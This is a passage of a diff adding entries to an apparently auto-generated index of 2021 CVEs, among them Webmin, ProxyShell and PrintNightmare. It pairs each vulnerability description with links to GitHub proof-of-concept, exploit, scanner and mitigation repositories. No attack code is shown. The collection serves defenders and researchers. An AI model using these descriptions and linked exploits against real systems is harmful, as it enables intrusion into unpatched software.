+- [l3eol3eo/CVE-2021-32099_SQLi](https://github.com/l3eol3eo/CVE-2021-32099_SQLi)
+- [akr3ch/CVE-2021-32099](https://github.com/akr3ch/CVE-2021-32099)
+
+### CVE-2021-32156 (2022-04-11)
+
+A cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.
+
+
+- [Mesh3l911/CVE-2021-32156](https://github.com/Mesh3l911/CVE-2021-32156)
+
+### CVE-2021-32157 (2022-04-11)
+
+A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.
+
+
+- [Mesh3l911/CVE-2021-32157](https://github.com/Mesh3l911/CVE-2021-32157)
+- [dnr6419/CVE-2021-32157](https://github.com/dnr6419/CVE-2021-32157)
+
+### CVE-2021-32158 (2022-04-11)
+
+A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Upload and Download feature.
+
+
+- [Mesh3l911/CVE-2021-32158](https://github.com/Mesh3l911/CVE-2021-32158)
+
+### CVE-2021-32159 (2022-04-11)
+
+A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Upload and Download feature.
+
+
+- [Mesh3l911/CVE-2021-32159](https://github.com/Mesh3l911/CVE-2021-32159)
+
+### CVE-2021-32160 (2022-04-11)
+
+A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the Add Users feature.
+
+
+- [Mesh3l911/CVE-2021-32160](https://github.com/Mesh3l911/CVE-2021-32160)
+
+### CVE-2021-32161 (2022-04-11)
+
+A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the File Manager feature.
+
+
+- [Mesh3l911/CVE-2021-32161](https://github.com/Mesh3l911/CVE-2021-32161)
+
+### CVE-2021-32162 (2022-04-11)
+
+A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 through the File Manager feature.
+
+
+- [Mesh3l911/CVE-2021-32162](https://github.com/Mesh3l911/CVE-2021-32162)
+
+### CVE-2021-32305 (2021-05-18)
+
+WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
+
+
+- [sz-guanx/CVE-2021-32305](https://github.com/sz-guanx/CVE-2021-32305)
+- [FredBrave/CVE-2021-32305-websvn-2.6.0](https://github.com/FredBrave/CVE-2021-32305-websvn-2.6.0)
+
+### CVE-2021-32399 (2021-05-10)
+
+net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI controller.
+
+
+- [nanopathi/linux-4.19.72_CVE-2021-32399](https://github.com/nanopathi/linux-4.19.72_CVE-2021-32399)
+
+### CVE-2021-32471 (2021-05-10)
+
+Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data. For example, a tape head may have an unexpected location after the processing of input composed of As and Bs (instead of 0s and 1s). NOTE: the discoverer states "this vulnerability has no real-world implications."
+
+
+- [intrinsic-propensity/turing-machine](https://github.com/intrinsic-propensity/turing-machine)
+
+### CVE-2021-32537 (2021-06-21)
+
+Realtek HAD contains a driver crashed vulnerability which allows local side attackers to send a special string to the kernel driver in a user’s mode. Due to unexpected commands, the kernel driver will cause the system crashed.
+
+
+- [0vercl0k/CVE-2021-32537](https://github.com/0vercl0k/CVE-2021-32537)
+
+### CVE-2021-32644 (2021-06-22)
+
+Ampache is an open source web based audio/video streaming application and file manager. Due to a lack of input filtering versions 4.x.y are vulnerable to code injection in random.php. The attack requires user authentication to access the random.php page unless the site is running in demo mode. This issue has been resolved in 4.4.3.
+
+
+- [dnr6419/CVE-2021-32644](https://github.com/dnr6419/CVE-2021-32644)
+
+### CVE-2021-32648 (2021-08-26)
+
+octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
+
+
+- [Immersive-Labs-Sec/CVE-2021-32648](https://github.com/Immersive-Labs-Sec/CVE-2021-32648)
+- [daftspunk/CVE-2021-32648](https://github.com/daftspunk/CVE-2021-32648)
+
+### CVE-2021-32682 (2021-06-14)
+
+elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
+
+
+- [nickswink/CVE-2021-32682](https://github.com/nickswink/CVE-2021-32682)
+
+### CVE-2021-32724 (2021-09-09)
+
+check-spelling is a github action which provides CI spell checking. In affected versions and for a repository with the [check-spelling action](https://github.com/marketplace/actions/check-spelling) enabled that triggers on `pull_request_target` (or `schedule`), an attacker can send a crafted Pull Request that causes a `GITHUB_TOKEN` to be exposed. With the `GITHUB_TOKEN`, it's possible to push commits to the repository bypassing standard approval processes. Commits to the repository could then steal any/all secrets available to the repository. As a workaround users may can either: [Disable the workflow](https://docs.github.com/en/actions/managing-workflow-runs/disabling-and-enabling-a-workflow) until you've fixed all branches or Set repository to [Allow specific actions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#allowing-specific-actions-to-run). check-spelling isn't a verified creator and it certainly won't be anytime soon. You could then explicitly add other actions that your repository uses. Set repository [Workflow permissions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#setting-the-permissions-of-the-github_token-for-your-repository) to `Read repository contents permission`. Workflows using `check-spelling/check-spelling@main` will get the fix automatically. Workflows using a pinned sha or tagged version will need to change the affected workflows for all repository branches to the latest version. Users can verify who and which Pull Requests have been running the action by looking up the spelling.yml action in the Actions tab of their repositories, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml - you can filter PRs by adding ?query=event%3Apull_request_target, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml?query=event%3Apull_request_target.
+
+
+- [MaximeSchlegel/CVE-2021-32724-Target](https://github.com/MaximeSchlegel/CVE-2021-32724-Target)
+
+### CVE-2021-32789 (2021-07-26)
+
+woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
+
+
+- [and0x00/CVE-2021-32789](https://github.com/and0x00/CVE-2021-32789)
+- [DonVorrin/CVE-2021-32789](https://github.com/DonVorrin/CVE-2021-32789)
+
+### CVE-2021-32804 (2021-08-03)
+
+The npm package "tar" (aka node-tar) before versions 6.1.1, 5.0.6, 4.4.14, and 3.3.2 has a arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example `/home/user/.bashrc` would turn into `home/user/.bashrc`. This logic was insufficient when file paths contained repeated path roots such as `////home/user/.bashrc`. `node-tar` would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.2, 4.4.14, 5.0.6 and 6.1.1. Users may work around this vulnerability without upgrading by creating a custom `onentry` method which sanitizes the `entry.path` or a `filter` method which removes entries with absolute paths. See referenced GitHub Advisory for details. Be aware of CVE-2021-32803 which fixes a similar bug in later versions of tar.
+
+
+- [yamory/CVE-2021-32804](https://github.com/yamory/CVE-2021-32804)
+
+### CVE-2021-32819 (2021-05-14)
+
+Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.
+
+
+- [Abady0x1/CVE-2021-32819](https://github.com/Abady0x1/CVE-2021-32819)
+
+### CVE-2021-32849 (2022-01-26)
+
+Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds.
+
+
+- [bb33bb/CVE-2021-32849](https://github.com/bb33bb/CVE-2021-32849)
+- [lowkey0808/cve-2021-32849](https://github.com/lowkey0808/cve-2021-32849)
+
+### CVE-2021-33026 (2021-05-13)
+
+The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code. NOTE: a third party indicates that exploitation is extremely unlikely unless the machine is already compromised; in other cases, the attacker would be unable to write their payload to the cache and generate the required collision
+
+
+- [CarlosG13/CVE-2021-33026](https://github.com/CarlosG13/CVE-2021-33026)
+
+### CVE-2021-33034 (2021-05-14)
+
+In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value.
+
+
+- [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034)
+
+### CVE-2021-33044 (2021-09-15)
+
+The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
+
+
+- [bp2008/DahuaLoginBypass](https://github.com/bp2008/DahuaLoginBypass)
+- [dorkerdevil/CVE-2021-33044](https://github.com/dorkerdevil/CVE-2021-33044)
+- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo)
+- [haingn/LoHongCam-CVE-2021-33044](https://github.com/haingn/LoHongCam-CVE-2021-33044)
+
+### CVE-2021-33045 (2021-09-15)
+
+The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
+
+
+- [dongpohezui/cve-2021-33045](https://github.com/dongpohezui/cve-2021-33045)
+
+### CVE-2021-33104 (2023-02-16)
+
+Improper access control in the Intel(R) OFU software before version 14.1.28 may allow an authenticated user to potentially enable denial of service via local access.
+
+
+- [rjt-gupta/CVE-2021-33104](https://github.com/rjt-gupta/CVE-2021-33104)
+
+### CVE-2021-33558 (2021-05-27)
+
+Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.
+
+
+- [mdanzaruddin/CVE-2021-33558.](https://github.com/mdanzaruddin/CVE-2021-33558.)
+- [anldori/CVE-2021-33558](https://github.com/anldori/CVE-2021-33558)
+
+### CVE-2021-33560 (2021-06-08)
+
+Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.
+
+
+- [IBM/PGP-client-checker-CVE-2021-33560](https://github.com/IBM/PGP-client-checker-CVE-2021-33560)
+
+### CVE-2021-33564 (2021-05-29)
+
+An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
+
+
+- [mlr0p/CVE-2021-33564](https://github.com/mlr0p/CVE-2021-33564)
+- [dorkerdevil/CVE-2021-33564](https://github.com/dorkerdevil/CVE-2021-33564)
+
+### CVE-2021-33624 (2021-06-23)
+
+In kernel/bpf/verifier.c in the Linux kernel before 5.12.13, a branch can be mispredicted (e.g., because of type confusion) and consequently an unprivileged BPF program can read arbitrary memory locations via a side-channel attack, aka CID-9183671af6db.
+
+
+- [benschlueter/CVE-2021-33624](https://github.com/benschlueter/CVE-2021-33624)
+
+### CVE-2021-33690 (2021-09-15)
+
+Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.
+
+
+- [redrays-io/CVE-2021-33690](https://github.com/redrays-io/CVE-2021-33690)
+
+### CVE-2021-33739 (2021-06-08)
+
+Microsoft DWM Core Library Elevation of Privilege Vulnerability
+
+
+- [freeide2017/CVE-2021-33739-POC](https://github.com/freeide2017/CVE-2021-33739-POC)
+- [giwon9977/CVE-2021-33739_PoC_Analysis](https://github.com/giwon9977/CVE-2021-33739_PoC_Analysis)
+
+### CVE-2021-33766 (2021-07-14)
+
+Microsoft Exchange Server Information Disclosure Vulnerability
+
+
+- [bhdresh/CVE-2021-33766](https://github.com/bhdresh/CVE-2021-33766)
+- [demossl/CVE-2021-33766-ProxyToken](https://github.com/demossl/CVE-2021-33766-ProxyToken)
+
+### CVE-2021-33831 (2021-09-07)
+
+api/account/register in the TH Wildau COVID-19 Contact Tracing application through 2021-09-01 has Incorrect Access Control. An attacker can interfere with tracing of infection chains by creating 500 random users within 2500 seconds.
+
+
+- [lanmarc77/CVE-2021-33831](https://github.com/lanmarc77/CVE-2021-33831)
+
+### CVE-2021-33879 (2021-06-06)
+
+Tencent GameLoop before 4.1.21.90 downloaded updates over an insecure HTTP connection. A malicious attacker in an MITM position could spoof the contents of an XML document describing an update package, replacing a download URL with one pointing to an arbitrary Windows executable. Because the only integrity check would be a comparison of the downloaded file's MD5 checksum to the one contained within the XML document, the downloaded executable would then be executed on the victim's machine.
+
+
+- [mmiszczyk/cve-2021-33879](https://github.com/mmiszczyk/cve-2021-33879)
+
+### CVE-2021-33909 (2021-07-20)
+
+fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05.
+
+
+- [Liang2580/CVE-2021-33909](https://github.com/Liang2580/CVE-2021-33909)
+- [baerwolf/cve-2021-33909](https://github.com/baerwolf/cve-2021-33909)
+- [bbinfosec43/CVE-2021-33909](https://github.com/bbinfosec43/CVE-2021-33909)
+- [ChrisTheCoolHut/CVE-2021-33909](https://github.com/ChrisTheCoolHut/CVE-2021-33909)
+
+### CVE-2021-33959 (2023-01-18)
+
+Plex media server 1.21 and before is vulnerable to ddos reflection attack via plex service.
+
+
+- [lixiang957/CVE-2021-33959](https://github.com/lixiang957/CVE-2021-33959)
+
+### CVE-2021-34045
+- [Al1ex/CVE-2021-34045](https://github.com/Al1ex/CVE-2021-34045)
+- [kenuosec/CVE-2021-34045](https://github.com/kenuosec/CVE-2021-34045)
+
+### CVE-2021-34371 (2021-08-05)
+
+Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that arbitrarily deserializes Java objects, e.g., through setSessionVariable. An attacker can abuse this for remote code execution because there are dependencies with exploitable gadget chains.
+
+
+- [zwjjustdoit/CVE-2021-34371.jar](https://github.com/zwjjustdoit/CVE-2021-34371.jar)
+
+### CVE-2021-34428 (2021-06-22)
+
+For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in.
+
+
+- [Trinadh465/jetty_9.4.31_CVE-2021-34428](https://github.com/Trinadh465/jetty_9.4.31_CVE-2021-34428)
+
+### CVE-2021-34429 (2021-07-15)
+
+For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
+
+
+- [ColdFusionX/CVE-2021-34429](https://github.com/ColdFusionX/CVE-2021-34429)
+
+### CVE-2021-34470 (2021-07-14)
+
+Microsoft Exchange Server Elevation of Privilege Vulnerability
+
+
+- [technion/CVE-2021-34470scanner](https://github.com/technion/CVE-2021-34470scanner)
+
+### CVE-2021-34473 (2021-07-14)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [cyberheartmi9/Proxyshell-Scanner](https://github.com/cyberheartmi9/Proxyshell-Scanner)
+- [RaouzRouik/CVE-2021-34473-scanner](https://github.com/RaouzRouik/CVE-2021-34473-scanner)
+- [p2-98/CVE-2021-34473](https://github.com/p2-98/CVE-2021-34473)
+- [horizon3ai/proxyshell](https://github.com/horizon3ai/proxyshell)
+- [je6k/CVE-2021-34473-Exchange-ProxyShell](https://github.com/je6k/CVE-2021-34473-Exchange-ProxyShell)
+- [jrgdiaz/ProxyShell-CVE-2021-34473.py](https://github.com/jrgdiaz/ProxyShell-CVE-2021-34473.py)
+- [kh4sh3i/ProxyShell](https://github.com/kh4sh3i/ProxyShell)
+- [ipsBruno/CVE-2021-34473-NMAP-SCANNER](https://github.com/ipsBruno/CVE-2021-34473-NMAP-SCANNER)
+- [f4alireza/CVE](https://github.com/f4alireza/CVE)
+
+### CVE-2021-34481 (2021-07-16)
+
+<p>A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p><strong>UPDATE</strong> August 10, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. This security update changes the Point and Print default behavior; please see <a href="https://support.microsoft.com/help/5005652">KB5005652</a>.</p>\n
+
+
+- [vpn28/CVE-2021-34481](https://github.com/vpn28/CVE-2021-34481)
+
+### CVE-2021-34486 (2021-08-12)
+
+Windows Event Tracing Elevation of Privilege Vulnerability
+
+
+- [KaLendsi/CVE-2021-34486](https://github.com/KaLendsi/CVE-2021-34486)
+- [b1tg/CVE-2021-34486-exp](https://github.com/b1tg/CVE-2021-34486-exp)
+
+### CVE-2021-34496 (2021-07-14)
+
+Windows GDI Information Disclosure Vulnerability
+
+
+- [dja2TaqkGEEfA45/CVE-2021-34496](https://github.com/dja2TaqkGEEfA45/CVE-2021-34496)
+
+### CVE-2021-34523 (2021-07-14)
+
+Microsoft Exchange Server Elevation of Privilege Vulnerability
+
+
+- [mithridates1313/ProxyShell_POC](https://github.com/mithridates1313/ProxyShell_POC)
+- [SUPRAAA-1337/CVE-2021-34523](https://github.com/SUPRAAA-1337/CVE-2021-34523)
+
+### CVE-2021-34527 (2021-07-02)
+
+<p>A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p>UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.</p>\n<p>In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (<strong>Note</strong>: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):</p>\n<ul>\n<li>HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint</li>\n<li>NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)</li>\n<li>UpdatePromptSettings = 0 (DWORD) or not defined (default setting)</li>\n</ul>\n<p><strong>Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.</strong></p>\n<p>UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also <a href="https://support.microsoft.com/topic/31b91c02-05bc-4ada-a7ea-183b129578a7">KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates</a>.</p>\n<p>Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.</p>\n
+
+
+- [DenizSe/CVE-2021-34527](https://github.com/DenizSe/CVE-2021-34527)
+- [thomas-lauer/PrintNightmare](https://github.com/thomas-lauer/PrintNightmare)
+- [JohnHammond/CVE-2021-34527](https://github.com/JohnHammond/CVE-2021-34527)
+- [nemo-wq/PrintNightmare-CVE-2021-34527](https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527)
+- [CnOxx1/CVE-2021-34527-1675](https://github.com/CnOxx1/CVE-2021-34527-1675)
+- [rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint](https://github.com/rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint)
+- [geekbrett/CVE-2021-34527-PrintNightmare-Workaround](https://github.com/geekbrett/CVE-2021-34527-PrintNightmare-Workaround)
+- [byt3bl33d3r/ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream)
+- [vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527](https://github.com/vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527)
+- [powershellpr0mpt/PrintNightmare-CVE-2021-34527](https://github.com/powershellpr0mpt/PrintNightmare-CVE-2021-34527)
+- [WidespreadPandemic/CVE-2021-34527_ACL_mitigation](https://github.com/WidespreadPandemic/CVE-2021-34527_ACL_mitigation)
+- [glorisonlai/printnightmare](https://github.com/glorisonlai/printnightmare)
+- [dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC](https://github.com/dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC)
+- [Eutectico/Printnightmare](https://github.com/Eutectico/Printnightmare)
+- [syntaxbearror/PowerShell-PrintNightmare](https://github.com/syntaxbearror/PowerShell-PrintNightmare)
+- [0xirison/PrintNightmare-Patcher](https://github.com/0xirison/PrintNightmare-Patcher)
+- [Tomparte/PrintNightmare](https://github.com/Tomparte/PrintNightmare)
+- [Amaranese/CVE-2021-34527](https://github.com/Amaranese/CVE-2021-34527)
+- [cyb3rpeace/CVE-2021-34527](https://github.com/cyb3rpeace/CVE-2021-34527)
+- [m8sec/CVE-2021-34527](https://github.com/m8sec/CVE-2021-34527)
+- [hackerhouse-opensource/cve-2021-34527](https://github.com/hackerhouse-opensource/cve-2021-34527)
+- [d0rb/CVE-2021-34527](https://github.com/d0rb/CVE-2021-34527)
+- [TieuLong21Prosper/detect_bruteforce](https://github.com/TieuLong21Prosper/detect_bruteforce)
+- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784)
+
+### CVE-2021-34558 (2021-07-15)
+
+The crypto/tls package of Go through 1.16.5 does not properly assert that the type of public key in an X.509 certificate matches the expected type when doing a RSA based key exchange, allowing a malicious TLS server to cause a TLS client to panic.
+
+
+- [alexzorin/cve-2021-34558](https://github.com/alexzorin/cve-2021-34558)
+
+### CVE-2021-34600 (2022-01-18)
+
+Telenot CompasX versions prior to 32.0 use a weak seed for random number generation leading to predictable AES keys used in the NFC tags used for local authorization of users. This may lead to total loss of trustworthiness of the installation.\n\n
+
+
+- [x41sec/CVE-2021-34600](https://github.com/x41sec/CVE-2021-34600)
+
+### CVE-2021-34621 (2021-06-28)
+
+A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. .
+
+
+- [RandomRobbieBF/CVE-2021-34621](https://github.com/RandomRobbieBF/CVE-2021-34621)
+- [K3ysTr0K3R/CVE-2021-34621-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-34621-EXPLOIT)
+- [navreet1425/CVE-2021-34621](https://github.com/navreet1425/CVE-2021-34621)
+
+### CVE-2021-34646 (2021-08-24)
+
+Versions up to, and including, 5.4.3, of the Booster for WooCommerce WordPress plugin are vulnerable to authentication bypass via the process_email_verification function due to a random token generation weakness in the reset_and_mail_activation_link function found in the ~/includes/class-wcj-emails-verification.php file. This allows attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Email Verification module to be active in the plugin and the Login User After Successful Verification setting to be enabled, which it is by default.
+
+
+- [motikan2010/CVE-2021-34646](https://github.com/motikan2010/CVE-2021-34646)
+- [0xB455/CVE-2021-34646](https://github.com/0xB455/CVE-2021-34646)
+
+### CVE-2021-34730 (2021-08-18)
+
+A vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of incoming UPnP traffic. An attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition. Cisco has not released software updates that address this vulnerability.
+
+
+- [badmonkey7/CVE-2021-34730](https://github.com/badmonkey7/CVE-2021-34730)
+
+### CVE-2021-34767 (2021-09-22)
+
+A vulnerability in IPv6 traffic processing of Cisco IOS XE Wireless Controller Software for Cisco Catalyst 9000 Family Wireless Controllers could allow an unauthenticated, adjacent attacker to cause a Layer 2 (L2) loop in a configured VLAN, resulting in a denial of service (DoS) condition for that VLAN. The vulnerability is due to a logic error when processing specific link-local IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that would flow inbound through the wired interface of an affected device. A successful exploit could allow the attacker to cause traffic drops in the affected VLAN, thus triggering the DoS condition.
+
+
+- [lukejenkins/CVE-2021-34767](https://github.com/lukejenkins/CVE-2021-34767)
+
+### CVE-2021-34824 (2021-06-29)
+
+Istio (1.8.x, 1.9.0-1.9.5 and 1.10.0-1.10.1) contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces.
+
+
+- [rsalmond/CVE-2021-34824](https://github.com/rsalmond/CVE-2021-34824)
+
+### CVE-2021-35042 (2021-07-02)
+
+Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.
+
+
+- [YouGina/CVE-2021-35042](https://github.com/YouGina/CVE-2021-35042)
+- [mrlihd/CVE-2021-35042](https://github.com/mrlihd/CVE-2021-35042)
+- [r4vi/CVE-2021-35042](https://github.com/r4vi/CVE-2021-35042)
+- [zer0qs/CVE-2021-35042](https://github.com/zer0qs/CVE-2021-35042)
+- [LUUANHDUC/CVE-2021-35042](https://github.com/LUUANHDUC/CVE-2021-35042)
+
+### CVE-2021-35064 (2021-07-12)
+
+KramerAV VIAWare, all tested versions, allow privilege escalation through misconfiguration of sudo. Sudoers permits running of multiple dangerous commands, including unzip, systemctl and dpkg.
+
+
+- [Chocapikk/CVE-2021-35064](https://github.com/Chocapikk/CVE-2021-35064)
+
+### CVE-2021-35211 (2021-07-13)
+
+Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.
+
+
+- [NattiSamson/Serv-U-CVE-2021-35211](https://github.com/NattiSamson/Serv-U-CVE-2021-35211)
+- [0xhaggis/CVE-2021-35211](https://github.com/0xhaggis/CVE-2021-35211)
+- [BishopFox/CVE-2021-35211](https://github.com/BishopFox/CVE-2021-35211)
+
+### CVE-2021-35215 (2021-07-15)
+
+Insecure deserialization leading to Remote Code Execution was detected in the Orion Platform version 2020.2.5. Authentication is required to exploit this vulnerability.
+
+
+- [Y4er/CVE-2021-35215](https://github.com/Y4er/CVE-2021-35215)
+
+### CVE-2021-35250 (2022-04-25)
+
+A researcher reported a Directory Transversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.\n\n
+
+
+- [rissor41/SolarWinds-CVE-2021-35250](https://github.com/rissor41/SolarWinds-CVE-2021-35250)
+
+### CVE-2021-35296 (2021-10-04)
+
+An issue in the administrator authentication panel of PTCL HG150-Ub v3.0 allows attackers to bypass authentication via modification of the cookie value and Response Path.
+
+
+- [afaq1337/CVE-2021-35296](https://github.com/afaq1337/CVE-2021-35296)
+
+### CVE-2021-35448 (2021-06-24)
+
+Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections.
+
+
+- [deathflash1411/cve-2021-35448](https://github.com/deathflash1411/cve-2021-35448)
+
+### CVE-2021-35464 (2021-07-22)
+
+ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier
+
+
